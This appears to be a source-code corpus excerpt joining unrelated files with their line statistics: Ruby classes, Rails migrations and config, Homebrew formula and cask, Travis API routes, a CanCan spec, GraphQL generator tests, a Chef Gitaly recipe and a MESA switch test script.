  def initialize(file_manager = FileManager.instance, per_page = 4)
    @file_manager = file_manager
    @saved_links = file_manager.load_file
    @last_id = nil
    @links = []
    @per_page = per_page
    @cursor = nil
  end

  # @param index [Integer] 1-based index into the accumulated link list
  # @return [VCLink]
  # @raise [NoLinkError] when no link exists at +index+
  def find_by_index(index)
    link = @links[index - 1] # (removed redundant `|| nil`)
    raise NoLinkError, index if link.nil?

    link
  end

  # Finds a link, marks it visited and records its href for persistence.
  # @param index [Integer]
  # @return [VCLink]
  def find_by_index_and_mark(index)
    link = find_by_index(index)
    link.visited = true
    saved_links << link.href
    link
  end

  # rubocop:disable Metrics/AbcSize
  # Wraps the given nodes in VCLink objects, numbers them sequentially after
  # the links already collected, and advances the page cursor.
  # @param array [Array<Node>] raw nodes to wrap (doc fixed: was `links`)
  def fill_links(array)
    @cursor = cursor.nil? ? 1 : cursor + per_page
    current_step = links.size
    array
      .map { |i| VCLink.new(i) }
      .each_with_index do |link, index|
        link.index = index + 1 + current_step
        link.visited = true if saved_links.include?(link.href)
        @links << link
      end
    nil
  end
  # rubocop:enable Metrics/AbcSize

  # NOTE: it changes cursor to back
  def cursor_to_prev
    @cursor = case cursor
              when nil then nil
              when 1 then 1
              else
                cursor - per_page
              end
    nil
  end

  # Links belonging to the current page.
  # BUGFIX: the previous `links[from..to]` with to = cursor + per_page - 1
  # returned per_page + 1 elements, leaking the first link of the next page
  # onto the current one. `Array#[](start, length)` returns exactly per_page.
  # @return [Array<VCLink>]
  def current_links
    links[cursor - 1, per_page]
  end

  # Persists the unique set of visited hrefs via the file manager.
  def save_data
    file_manager.save_file(saved_links.uniq)
  end

  private

  attr_reader :file_manager, :saved_links, :cursor
end
end
| 23.2125 | 69 | 0.59343 |
03d53d4f2de85d9644e0e47894d31ff1a64c1ae9 | 2,085 | # frozen_string_literal: true
#
# bool2str.rb
#
# Registers the stdlib `bool2str` parser function with Puppet 3.x-style
# function API; the heredoc below is the user-facing reference docs.
module Puppet::Parser::Functions
  newfunction(:bool2str, type: :rvalue, doc: <<-DOC
    @summary
      Converts a boolean to a string using optionally supplied arguments.

    The optional second and third arguments represent what true and false will be
    converted to respectively. If only one argument is given, it will be
    converted from a boolean to a string containing 'true' or 'false'.

    @return
      The converted value to string of the given Boolean

    **Examples of usage**

      ```
        bool2str(true)            => 'true'
        bool2str(true, 'yes', 'no') => 'yes'
        bool2str(false, 't', 'f')   => 'f'
      ```

    Requires a single boolean as an input.

    > *Note:*
      since Puppet 5.0.0 it is possible to create new data types for almost any
      datatype using the type system and the built-in
      [`String.new`](https://puppet.com/docs/puppet/latest/function.html#boolean-to-string)
      function is used to convert to String with many different format options.

      ```
        notice(String(false))         # Notices 'false'
        notice(String(true))          # Notices 'true'
        notice(String(false, '%y'))   # Notices 'yes'
        notice(String(true, '%y'))    # Notices 'no'
      ```
  DOC
  ) do |arguments|
    # Valid arities: (bool) or (bool, true_string, false_string).
    unless arguments.size == 1 || arguments.size == 3
      raise(Puppet::ParseError, "bool2str(): Wrong number of arguments given (#{arguments.size} for 3)")
    end

    value = arguments[0]
    true_string = arguments[1] || 'true'
    false_string = arguments[2] || 'false'
    klass = value.class

    # We can have either true or false, and nothing else
    unless [FalseClass, TrueClass].include?(klass)
      raise(Puppet::ParseError, 'bool2str(): Requires a boolean to work with')
    end

    # Both replacement arguments must themselves be strings.
    unless [true_string, false_string].all? { |x| x.is_a?(String) }
      raise(Puppet::ParseError, 'bool2str(): Requires strings to convert to')
    end

    return value ? true_string : false_string
  end
end
# vim: set ts=2 sw=2 et :
| 32.076923 | 104 | 0.629736 |
2648bc88ca2a7d208068daaca57144be82e3a152 | 301 | # frozen_string_literal: true
# Migration to create media table
class CreateMedia < ActiveRecord::Migration[6.1]
  # Adds the `media` table: each row is named and belongs to a client
  # (non-null FK), with standard non-null timestamps.
  def change
    create_table :media do |table|
      table.references :client, null: false, foreign_key: true
      table.string :name, null: false

      table.timestamps null: false
    end
  end
end
| 21.5 | 58 | 0.697674 |
08ff0dfc58ae75fc718c2bd48e3e18a0bd4c2c9c | 212 | class AddTransactionerIdToSpreeStoreCredits < ActiveRecord::Migration
  # Adds an indexed transactioner_id column to spree_store_credits so each
  # credit can record who performed the transaction.
  def change
    add_column :spree_store_credits, :transactioner_id, :integer
    add_index :spree_store_credits, :transactioner_id
  end
end
| 30.285714 | 69 | 0.820755 |
79823979e583432d2a721f62460ba6476b33e74f | 135 | class AddHighScoreToDecks < ActiveRecord::Migration[5.1]
  # Adds a high_score float to decks, defaulting to 0 for existing rows.
  def change
    add_column :decks, :high_score, :float, default: 0
  end
end
| 22.5 | 56 | 0.740741 |
bb75bd19bd7c694c712babe110d38d0979e3b9d6 | 1,602 | class Ry < Formula
  # Homebrew formula for ry, a Ruby virtual-env/version switcher.
  desc "Ruby virtual env tool"
  homepage "https://github.com/jayferd/ry"
  url "https://github.com/jayferd/ry/archive/v0.5.2.tar.gz"
  sha256 "b53b51569dfa31233654b282d091b76af9f6b8af266e889b832bb374beeb1f59"
  head "https://github.com/jayferd/ry.git"

  # Pre-built bottles per macOS release.
  bottle do
    cellar :any_skip_relocation
    rebuild 1
    sha256 "022769e51adb7393c5b418aef50911e96bb6bc43dfc7d81850b6e71cea7c3a2d" => :mojave
    sha256 "7d9631e41ff87b979c1d94ce1bfe1a710dd031e923b447332186678e68a0f523" => :high_sierra
    sha256 "2703cd68ac926b7bd8dac25c93054993706d32a4c9857b450eb19f88bdf81530" => :sierra
    sha256 "5b324970a3a3c806029241e1c5c453c900f16b3aec8e32bedc5d1a6abb5670c7" => :el_capitan
    sha256 "7b8c7549875ff9a303735ffae235f520fd85af5796953ab92949d2ec7d69ecc6" => :yosemite
    sha256 "c94e0176f99aaefcdc84ef95c081aa348177662e1b7f20d429a5c56a5b98ef40" => :mavericks
  end

  depends_on "ruby-build" => :recommended
  depends_on "bash-completion" => :recommended

  # Install via the project's Makefile, pointing completions at Homebrew's
  # standard completion directories.
  def install
    ENV["PREFIX"] = prefix
    ENV["BASH_COMPLETIONS_DIR"] = etc/"bash_completion.d"
    ENV["ZSH_COMPLETIONS_DIR"] = share/"zsh/site-functions"
    system "make", "install"
  end

  def caveats; <<~EOS
    Please add to your profile:
      which ry &>/dev/null && eval "$(ry setup)"

    If you want your Rubies to persist across updates you
    should set the `RY_RUBIES` variable in your profile, i.e.
      export RY_RUBIES="#{HOMEBREW_PREFIX}/var/ry/rubies"
  EOS
  end

  # Smoke test: `ry ls` must run and create the rubies directory.
  test do
    ENV["RY_RUBIES"] = testpath/"rubies"
    system bin/"ry", "ls"
    assert_predicate testpath/"rubies", :exist?
  end
end
| 34.826087 | 93 | 0.748439 |
e94230e9e537bf74cacaf7f3d0b7527e21361e67 | 6,602 | module Travis::API::V3
# Declarative route table for Travis API V3. Each `resource` block maps URL
# templates to service actions via the DSL in routes/dsl.rb; `hide`/
# `hidden_resource` keep endpoints out of the public API description, and
# `capture` constrains how path segments are matched.
module Routes
  require 'travis/api/v3/routes/dsl'
  extend DSL

  resource :broadcasts do
    route '/broadcasts'
    get :for_current_user
  end

  # Single build plus its jobs and stages; cancel/restart are POST actions.
  resource :build do
    capture id: :digit
    route '/build/{build.id}'
    get :find
    post :cancel, '/cancel'
    post :restart, '/restart'

    resource :jobs do
      route '/jobs'
      get :find
    end

    resource :stages do
      route '/stages'
      get :find
    end
  end

  resource :builds do
    route '/builds'
    get :for_current_user
  end

  resource :jobs do
    route '/jobs'
    get :for_current_user
  end

  resource :cron do
    capture id: :digit
    route '/cron/{cron.id}'
    get :find
    delete :delete
  end

  # Enterprise-only license endpoint.
  enterprise do
    resource :enterprise_license do
      get :find
      route '/enterprise_license'
    end
  end

  resource :installation do
    route '/installation/{installation.github_id}'
    get :find
  end

  # Single job: log access (JSON or plain text), cancel/restart/debug.
  resource :job do
    capture id: :digit
    route '/job/{job.id}'
    get :find
    post :cancel, '/cancel'
    post :restart, '/restart'
    post :debug, '/debug'

    resource :log do
      route '/log'
      get :find
      get :find, '.txt'
      delete :delete
    end
  end

  resource :lint do
    route '/lint'
    post :lint
  end

  resource :organization do
    capture id: :digit
    route '/org/{organization.id}'
    get :find

    resource :preferences do
      route '/preferences'
      get :for_organization
    end

    resource :preference do
      route '/preference/{preference.name}'
      get :for_organization
      patch :update
    end
  end

  resource :organizations do
    route '/orgs'
    get :for_current_user
  end

  # Owner lookup by login (user or org) or by GitHub id.
  resource :owner do
    route '/owner/({owner.login}|{user.login}|{organization.login}|github_id/{owner.github_id})'
    get :find

    resource :repositories do
      route '/repos'
      get :for_owner
    end

    resource :active do
      route '/active'
      get :for_owner
    end
  end

  resource :repositories do
    route '/repos'
    get :for_current_user
  end

  # Repository-scoped resources; slug capture allows the URL-encoded
  # "owner%2Fname" form.
  resource :repository do
    capture id: :digit, slug: %r{[^/]+%2[fF][^/]+}
    route '/repo/({repository.id}|{repository.slug})'
    get :find
    post :activate, '/activate'
    post :deactivate, '/deactivate'
    post :migrate, '/migrate'
    post :star, '/star'
    post :unstar, '/unstar'
    hide(patch :update)

    resource :branch do
      route '/branch/{branch.name}'
      get :find

      resource :cron do
        route '/cron'
        get :for_branch
        post :create
      end
    end

    resource :branches do
      route '/branches'
      get :find
    end

    resource :builds do
      route '/builds'
      get :find
    end

    resource :caches do
      route '/caches'
      get :find
      delete :delete
    end

    resource :crons do
      route '/crons'
      get :for_repository
    end

    resource :requests do
      route '/requests'
      get :find
      post :create
    end

    resource :request do
      route '/request/{request.id}'
      get :find

      resource :messages do
        route '/messages'
        get :for_request
      end
    end

    resource :user_settings, as: :settings do
      route '/settings'
      get :for_repository
    end

    resource :user_setting, as: :setting do
      route '/setting/{setting.name}'
      get :find
      patch :update
    end

    resource :env_vars do
      route '/env_vars'
      get :for_repository
      post :create
    end

    resource :env_var do
      route '/env_var/{env_var.id}'
      get :find
      patch :update
      delete :delete
    end

    # This is the key we generate for encryption/decryption etc.
    # In V2 it was found at /repos/:repo_id/key
    resource :ssl_key, as: :key_pair_generated do
      route '/key_pair/generated'
      get :find
      post :create
    end

    # This is the key that users may choose to add on travis-ci.com
    # In V2 it was found at /settings/ssh_key/:repo_id
    resource :key_pair do
      route '/key_pair'
      get :find
      post :create
      patch :update
      delete :delete
    end

    resource :email_subscription do
      route '/email_subscription'
      delete :unsubscribe
      post :resubscribe
    end
  end

  # Single user by id, plus beta features and beta migration requests.
  resource :user do
    capture id: :digit
    route '/user/{user.id}'
    get :find
    post :sync, '/sync'

    resource :beta_features do
      route '/beta_features'
      get :find
    end

    resource :beta_feature do
      route '/beta_feature/{beta_feature.id}'
      patch :update
      delete :delete
    end

    resource :beta_migration_requests do
      route '/beta_migration_requests'
      get :proxy_find
    end

    resource :beta_migration_request do
      route '/beta_migration_request'
      post :proxy_create
    end
  end

  hidden_resource :beta_migration_requests do
    route '/beta_migration_requests'
    get :find
    post :create
  end

  # Current authenticated user.
  resource :user do
    route '/user'
    get :current
  end

  resource :preferences do
    route '/preferences'
    get :for_user
  end

  resource :preference do
    route '/preference/{preference.name}'
    get :find
    patch :update
  end

  # Billing endpoints (hidden from the public API description).
  hidden_resource :subscriptions do
    route '/subscriptions'
    get :all
    post :create
  end

  hidden_resource :subscription do
    route '/subscription/{subscription.id}'
    patch :update_address, '/address'
    patch :update_creditcard, '/creditcard'
    patch :update_plan, '/plan'
    patch :resubscribe, '/resubscribe'
    post :cancel, '/cancel'
    get :invoices, '/invoices'
  end

  hidden_resource :trials do
    route '/trials'
    get :all
    post :create
  end

  hidden_resource :plans do
    route '/plans'
    get :all
  end

  # GDPR export/purge, only mounted when the feature flag is set.
  if ENV['GDPR_ENABLED']
    hidden_resource :gdpr do
      route '/gdpr'
      post :export, '/export'
      delete :purge, '/purge'
    end
  end

  hidden_resource :insights do
    route '/insights'
    get :metrics, '/metrics'
    get :active_repos, '/repos/active'
  end
end
end
| 20.251534 | 98 | 0.558922 |
f8fda00823e87c19702309ebe3f0ea8422294bc8 | 876 | cask "nvidia-geforce-now" do
  # Version is "app_version,build_id"; the OTA URL uses only the build id.
  version "2.0.26.116,897C99"
  sha256 "f74cafac283b933d05fcf4957e7faad18de05f2a1169993a223a7bea124c3687"

  url "https://ota-downloads.nvidia.com/ota/GeForceNOW-release.app_#{version.after_comma}.zip"
  appcast "https://ota.nvidia.com/release/available?product=GFN-mac&version=#{version.before_comma}&channel=OFFICIAL",
          must_contain: "[]" # Only happens when there are no newer versions
  name "NVIDIA GeForce NOW"
  desc "Cloud gaming platform"
  homepage "https://www.nvidia.com/en-us/geforce/products/geforce-now/"

  depends_on macos: ">= :yosemite"

  # Renamed for consistency: app name is different in the Finder and in a shell.
  app "GeForceNOW.app", target: "NVIDIA GeForce NOW.app"

  # Leftover files removed by `brew uninstall --zap`.
  zap trash: [
    "~/Library/Application Support/NVIDIA/GeForceNOW",
    "~/Library/Preferences/com.nvidia.gfnpc.mall.helper.plist",
  ]
end
| 39.818182 | 118 | 0.743151 |
6a5b910adf13fcf91d284e57b9cac09dbc1a9411 | 444 | module IndexTank
  # Error hierarchy raised by the IndexTank client. All inherit from
  # StandardError so callers can catch them with a plain `rescue`.
  class IndexAlreadyExists < StandardError; end
  class NonExistentIndex < StandardError; end
  class TooManyIndexes < StandardError; end
  class MissingFunctionDefinition < StandardError; end
  class InvalidApiKey < StandardError; end
  class InvalidQuery < StandardError; end
  class IndexInitializing < StandardError; end
  class InvalidArgument < StandardError; end
  class UnexpectedHTTPException < StandardError; end
end
| 37 | 54 | 0.810811 |
f7e06d83b7e4a9c9165f5dc147be41728323593d | 3,583 | Rails.application.configure do
  # Production environment configuration for this Rails app.
  # Settings specified here will take precedence over those in config/application.rb.

  # Code is not reloaded between requests.
  config.cache_classes = true

  # Eager load code on boot. This eager loads most of Rails and
  # your application in memory, allowing both threaded web servers
  # and those relying on copy on write to perform better.
  # Rake tasks automatically ignore this option for performance.
  config.eager_load = true

  # Full error reports are disabled and caching is turned on.
  config.consider_all_requests_local       = false
  config.action_controller.perform_caching = true

  # Disable serving static files from the `/public` folder by default since
  # Apache or NGINX already handles this.
  config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?

  # Compress JavaScripts and CSS.
  config.assets.js_compressor = :uglifier
  # config.assets.css_compressor = :sass

  # Do not fallback to assets pipeline if a precompiled asset is missed.
  config.assets.compile = false

  # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb

  # Enable serving of images, stylesheets, and JavaScripts from an asset server.
  # config.action_controller.asset_host = 'http://assets.example.com'

  # Specifies the header that your server uses for sending files.
  # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
  # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX

  # Mount Action Cable outside main process or domain
  # config.action_cable.mount_path = nil
  # config.action_cable.url = 'wss://example.com/cable'
  # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]

  # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
  config.force_ssl = true

  # Use the lowest log level to ensure availability of diagnostic information
  # when problems arise.
  config.log_level = :debug

  # Prepend all log lines with the following tags.
  config.log_tags = [ :request_id ]

  # Use a different cache store in production.
  # config.cache_store = :mem_cache_store

  # Use a real queuing backend for Active Job (and separate queues per environment)
  # config.active_job.queue_adapter     = :resque
  # config.active_job.queue_name_prefix = "messages_app_#{Rails.env}"
  config.action_mailer.perform_caching = false

  # Ignore bad email addresses and do not raise email delivery errors.
  # Set this to true and configure the email server for immediate delivery to raise delivery errors.
  # config.action_mailer.raise_delivery_errors = false

  # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
  # the I18n.default_locale when a translation cannot be found).
  config.i18n.fallbacks = true

  # Send deprecation notices to registered listeners.
  config.active_support.deprecation = :notify

  # Use default logging formatter so that PID and timestamp are not suppressed.
  config.log_formatter = ::Logger::Formatter.new

  # Use a different logger for distributed setups.
  # require 'syslog/logger'
  # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')

  # Log to STDOUT when requested (useful for containerized deployments).
  if ENV["RAILS_LOG_TO_STDOUT"].present?
    logger           = ActiveSupport::Logger.new(STDOUT)
    logger.formatter = config.log_formatter
    config.logger = ActiveSupport::TaggedLogging.new(logger)
  end

  # Do not dump schema after migrations.
  config.active_record.dump_schema_after_migration = false
end
| 41.183908 | 102 | 0.759419 |
0363306becdce188ac3e02e0bc78bf46730c046d | 433 | require 'aspose_pdf_cloud'
include AsposePdfCloud

# Example script: upload a PDF to Aspose.PDF Cloud and list its movie
# annotations. Credentials are placeholders — substitute real values.
app_key = 'XXXXX'
app_sid = 'XXXXX'

@pdf_api = PdfApi.new(app_key, app_sid)

file_name = 'PdfWithAnnotations.pdf'

# Upload the File
@pdf_api.put_create(file_name, :: File.open('example_data/' + file_name, 'r') { |io| io.read(io.size) })
puts 'Uploaded the File'

opts = {
  :folder => @temp_folder
}

# Fetch the document's movie annotations and print the response.
response = @pdf_api.get_document_movie_annotations(file_name, opts)
# NOTE(review): the trailing "| 27.0625 | 104 | 0.741339 |" below looks like a
# dataset-join artifact fused onto this line — confirm against the original script.
puts response | 27.0625 | 104 | 0.741339 |
084278a2ca9425a473d3e646f5c7ce35d51f145c | 3,731 | require 'rails_helper'
# Permission matrix for Admin#rights: each context pins what a given rights
# level ('standard', 'admin', 'superadmin') may do through CanCan's Ability.
describe Ability do
  let(:ability) { Ability.new(admin) }

  context 'standard rights' do
    let(:admin) { create(:admin, rights: 'standard') }

    # Read-mostly: may manage itself and read data, but no destructive actions.
    specify { expect(ability.can?(:manage, admin)).to be true }
    specify { expect(ability.can?(:read, Admin.new)).to be false }
    specify { expect(ability.can?(:read, MailTemplate)).to be true }
    specify { expect(ability.can?(:update, MailTemplate)).to be false }
    specify { expect(ability.can?(:manage, Member)).to be false }
    specify { expect(ability.can?(:create, Delivery)).to be false }
    specify { expect(ability.can?(:read, Member)).to be true }
    specify { expect(ability.can?(:destroy, Member)).to be false }
    specify { expect(ability.can?(:validate, Member)).to be false }
    specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be false }
    specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be false }
    specify { expect(ability.can?(:destroy, ActiveAdmin::Comment)).to be false }
    specify { expect(ability.can?(:create, ActiveAdmin::Comment)).to be true }
    specify { expect(ability.can?(:destroy, Invoice)).to be false }
  end

  context 'admin rights' do
    let(:admin) { create(:admin, rights: 'admin') }

    # Full member management; may only destroy invoices that were never sent.
    specify { expect(ability.can?(:manage, admin)).to be true }
    specify { expect(ability.can?(:read, Admin.new)).to be true }
    specify { expect(ability.can?(:read, MailTemplate)).to be true }
    specify { expect(ability.can?(:update, MailTemplate)).to be false }
    specify { expect(ability.can?(:create, Member)).to be true }
    specify { expect(ability.can?(:update, Member)).to be true }
    specify { expect(ability.can?(:destroy, Member)).to be true }
    specify { expect(ability.can?(:validate, Member)).to be true }
    specify { expect(ability.can?(:manage, Delivery)).to be true }
    specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
    specify { expect(ability.can?(:deactivate, Member.new(state: 'support'))).to be true }
    specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be true }
    specify { expect(ability.can?(:destroy, ActiveAdmin::Comment)).to be true }
    specify { expect(ability.can?(:destroy, Invoice.new)).to be true }
    specify { expect(ability.can?(:destroy, Invoice.new(sent_at: Time.current))).to be false }

    # When the ACP sells shares, support members cannot simply be deactivated.
    context 'share price' do
      before { Current.acp.update!(share_price: 420) }

      specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
      specify { expect(ability.can?(:deactivate, Member.new(state: 'support'))).to be false }
    end
  end

  context 'superadmin rights' do
    let(:admin) { create(:admin, rights: 'superadmin') }

    # Everything admins can, plus managing other admins and mail templates;
    # basket sizes/complements still cannot be destroyed.
    specify { expect(ability.can?(:manage, admin)).to be true }
    specify { expect(ability.can?(:manage, Admin.new)).to be true }
    specify { expect(ability.can?(:create, MailTemplate)).to be true }
    specify { expect(ability.can?(:create, Member)).to be true }
    specify { expect(ability.can?(:update, Member)).to be true }
    specify { expect(ability.can?(:destroy, Member)).to be true }
    specify { expect(ability.can?(:validate, Member)).to be true }
    specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
    specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be true }
    specify { expect(ability.can?(:destroy, Invoice.new)).to be true }
    specify { expect(ability.can?(:destroy, Invoice.new(sent_at: Time.current))).to be false }
    specify { expect(ability.can?(:destroy, BasketSize)).to be false }
    specify { expect(ability.can?(:destroy, BasketComplement)).to be false }
  end
end
| 53.3 | 94 | 0.672474 |
33ae44d37bd277a5ffbf22adc527bd525ee01ad3 | 3,719 | # frozen_string_literal: true
require "spec_helper"
require "generators/graphql/object_generator"
# Generator tests for `rails g graphql:object`: field-type coercion,
# namespacing, Relay nodes and ActiveRecord schema introspection.
class GraphQLGeneratorsObjectGeneratorTest < BaseGeneratorTest
  tests Graphql::Generators::ObjectGenerator

  # In-memory table used by the schema-introspection tests below.
  ActiveRecord::Schema.define do
    create_table :test_users do |t|
      t.datetime :created_at
      t.date :birthday
      t.integer :points, null: false
      t.decimal :rating, null: false
    end
  end

  # rubocop:disable Style/ClassAndModuleChildren
  class ::TestUser < ActiveRecord::Base
  end
  # rubocop:enable Style/ClassAndModuleChildren

  test "it generates fields with types" do
    # All three argument styles must normalize to the same generated file.
    commands = [
      # GraphQL-style:
      ["Bird", "wingspan:Int!", "foliage:[Color]"],
      # Ruby-style:
      ["BirdType", "wingspan:!Integer", "foliage:[Types::ColorType]"],
      # Mixed
      ["BirdType", "wingspan:!Int", "foliage:[Color]"],
    ]

    expected_content = <<-RUBY
# frozen_string_literal: true

module Types
  class BirdType < Types::BaseObject
    field :wingspan, Integer, null: false
    field :foliage, [Types::ColorType]
  end
end
    RUBY

    commands.each do |c|
      prepare_destination
      run_generator(c)
      assert_file "app/graphql/types/bird_type.rb", expected_content
    end
  end

  test "it generates fields with namespaced types" do
    commands = [
      # GraphQL-style:
      ["Bird", "wingspan:Int!", "foliage:[Color]"],
      # Ruby-style:
      ["BirdType", "wingspan:!Integer", "foliage:[Types::ColorType]"],
      # Mixed
      ["BirdType", "wingspan:!Int", "foliage:[Color]"],
    ].map { |c| c + ["--namespaced-types"]}

    expected_content = <<-RUBY
# frozen_string_literal: true

module Types
  class Objects::BirdType < Types::BaseObject
    field :wingspan, Integer, null: false
    field :foliage, [Types::ColorType]
  end
end
    RUBY

    commands.each do |c|
      prepare_destination
      run_generator(c)
      assert_file "app/graphql/types/objects/bird_type.rb", expected_content
    end
  end

  test "it generates namespaced classifed file" do
    run_generator(["books/page"])
    assert_file "app/graphql/types/books/page_type.rb", <<-RUBY
# frozen_string_literal: true

module Types
  class Books::PageType < Types::BaseObject
  end
end
    RUBY
  end

  test "it makes Relay nodes" do
    run_generator(["Page", "--node"])
    assert_file "app/graphql/types/page_type.rb", <<-RUBY
# frozen_string_literal: true

module Types
  class PageType < Types::BaseObject
    implements GraphQL::Types::Relay::Node
  end
end
    RUBY
  end

  test "it generates objects based on ActiveRecord schema, with namespaced types" do
    run_generator(["TestUser", "--namespaced-types"])
    assert_file "app/graphql/types/objects/test_user_type.rb", <<-RUBY
# frozen_string_literal: true

module Types
  class Objects::TestUserType < Types::BaseObject
    field :id, ID, null: false
    field :created_at, GraphQL::Types::ISO8601DateTime
    field :birthday, GraphQL::Types::ISO8601Date
    field :points, Integer, null: false
    field :rating, Float, null: false
  end
end
    RUBY
  end

  test "it generates objects based on ActiveRecord schema with additional custom fields" do
    run_generator(["TestUser", "name:!String", "email:!Citext", "settings:jsonb"])
    assert_file "app/graphql/types/test_user_type.rb", <<-RUBY
# frozen_string_literal: true

module Types
  class TestUserType < Types::BaseObject
    field :id, ID, null: false
    field :created_at, GraphQL::Types::ISO8601DateTime
    field :birthday, GraphQL::Types::ISO8601Date
    field :points, Integer, null: false
    field :rating, Float, null: false
    field :name, String, null: false
    field :email, String, null: false
    field :settings, GraphQL::Types::JSON
  end
end
    RUBY
  end
end
| 26.564286 | 91 | 0.693735 |
6a0b6e5ceccf2216ca738ac6fc15debca699f794 | 3,657 | #
#
# Copyright:: Copyright (c) 2017 GitLab Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

# Chef recipe: install and run the Gitaly service under runit.
account_helper = AccountHelper.new(node)
working_dir = node['gitaly']['dir']
log_directory = node['gitaly']['log_directory']
env_directory = node['gitaly']['env_directory']
config_path = File.join(working_dir, "config.toml")
gitaly_path = node['gitaly']['bin_path']
wrapper_path = "#{gitaly_path}-wrapper"
pid_file = File.join(working_dir, "gitaly.pid")
json_logging = node['gitaly']['logging_format'].eql?('json')

directory working_dir do
  owner account_helper.gitlab_user
  mode '0700'
  recursive true
end

directory log_directory do
  owner account_helper.gitlab_user
  mode '0700'
  recursive true
end

# Doing this in attributes/default.rb will need gitlab cookbook to be loaded
# before gitaly cookbook. This means gitaly cookbook has to depend on gitlab
# cookbook. Since gitlab cookbook already depends on gitaly cookbook, this
# causes a circular dependency. To avoid it, the default value is set in the
# recipe itself.
node.default['gitaly']['env'] = {
  'HOME' => node['gitlab']['user']['home'],
  'PATH' => "#{node['package']['install-dir']}/bin:#{node['package']['install-dir']}/embedded/bin:/bin:/usr/bin",
  'TZ' => ':/etc/localtime',
  # This is needed by gitlab-markup to import Python docutils
  'PYTHONPATH' => "#{node['package']['install-dir']}/embedded/lib/python3.7/site-packages",
  # Charlock Holmes and libicu will report U_FILE_ACCESS_ERROR if this is not set to the right path
  # See https://gitlab.com/gitlab-org/gitlab-ce/issues/17415#note_13868167
  'ICU_DATA' => "#{node['package']['install-dir']}/embedded/share/icu/current",
  'SSL_CERT_DIR' => "#{node['package']['install-dir']}/embedded/ssl/certs/",
  # wrapper script parameters
  'GITALY_PID_FILE' => pid_file,
  'WRAPPER_JSON_LOGGING' => json_logging.to_s
}

env_dir env_directory do
  variables node['gitaly']['env']
  notifies :restart, "service[gitaly]"
end

# Config changes only HUP the service (graceful reload) rather than restart it.
template "Create Gitaly config.toml" do
  path config_path
  source "gitaly-config.toml.erb"
  owner "root"
  group account_helper.gitlab_group
  mode "0640"
  variables node['gitaly'].to_hash
  notifies :hup, "runit_service[gitaly]"
end

runit_service 'gitaly' do
  down node['gitaly']['ha']
  options({
    user: account_helper.gitlab_user,
    groupname: account_helper.gitlab_group,
    working_dir: working_dir,
    env_dir: env_directory,
    bin_path: gitaly_path,
    wrapper_path: wrapper_path,
    config_path: config_path,
    log_directory: log_directory,
    json_logging: json_logging
  }.merge(params))
  log_options node['gitlab']['logging'].to_hash.merge(node['gitaly'].to_hash)
end

if node['gitlab']['bootstrap']['enable']
  execute "/opt/gitlab/bin/gitlab-ctl start gitaly" do
    retries 20
  end
end

# Record the installed Gitaly version; a change triggers a graceful reload.
file File.join(working_dir, "VERSION") do
  content VersionHelper.version("/opt/gitlab/embedded/bin/gitaly --version")
  notifies :hup, "runit_service[gitaly]"
end

if node['consul']['enable'] && node['consul']['monitoring_service_discovery']
  consul_service 'gitaly' do
    socket_address node['gitaly']['prometheus_listen_addr']
  end
end
| 34.17757 | 113 | 0.732568 |
87e9255d49e07010ce3f01cf9af90f9e9e02f41e | 184 | # frozen_string_literal: true
# encoding: utf-8
# Mongoid document: a named role that belongs to a user and a post and
# recursively embeds child roles (defines parent_role/child_roles).
class Role
  include Mongoid::Document

  # Display name of the role.
  field :name, type: String

  belongs_to :user
  belongs_to :post

  recursively_embeds_many
end
| 16.727273 | 29 | 0.766304 |
f8f9975ae6641abcea6af41deadc3f06324420fb | 7,411 | #!/usr/bin/env ruby
# Copyright (c) 2004-2020 Microchip Technology Inc. and its subsidiaries.
# SPDX-License-Identifier: MIT

require_relative 'libeasy/et'

# Board-to-board test setup with four ports; skip unless the chip supports
# QoS ingress maps.
$ts = get_test_setup("mesa_pc_b2b_4x")

cap_check_exit("QOS_INGRESS_MAP_CNT")

#---------- Configuration -----------------------------------------------------
# Host port indices for frame injection/extraction and the VLAN used.
$idx_tx = 0
$idx_rx = 1
$vid_a = 10

test "conf" do
    t_i("C-ports")
    $ts.dut.port_list.each do |port|
        conf = $ts.dut.call("mesa_vlan_port_conf_get", port)
        conf["port_type"] = "MESA_VLAN_PORT_TYPE_C"
        $ts.dut.call("mesa_vlan_port_conf_set", port, conf)
    end

    t_i("Include both ports in VLAN")
    port_list = port_idx_list_str([$idx_tx, $idx_rx])
    $ts.dut.call("mesa_vlan_port_members_set", 1, port_list)
    $ts.dut.call("mesa_vlan_port_members_set", $vid_a, port_list)
end
#---------- Frame testing -----------------------------------------------------

# Each entry in the test table has these items:
# 1: Text string printed during test
# 2: Switch Rx port configuration values
# 3: Switch Tx port configuration values
# 3: Host Tx frame values
# 4: Host Rx frame values expected
#
# NOTE: the Rx/Tx config hashes mix symbol keys (map key/match values such as
# :pcp) with string keys ("pcp", "dscp", ...) that select the map's actions —
# see map_set below, which only looks at the string keys.
$test_table =
    [
     {
         txt: "rx pcp to pcp",
         rx_cfg: {id: 1, key: "PCP", pcp: 7, "pcp" => 5},
         tx_cfg: {},
         tx_frm: {pcp: 7}, # Mapped to PCP = 5
         rx_frm: {pcp: 5}  # Classified value
     },
     {
         txt: "rx pcp to dei",
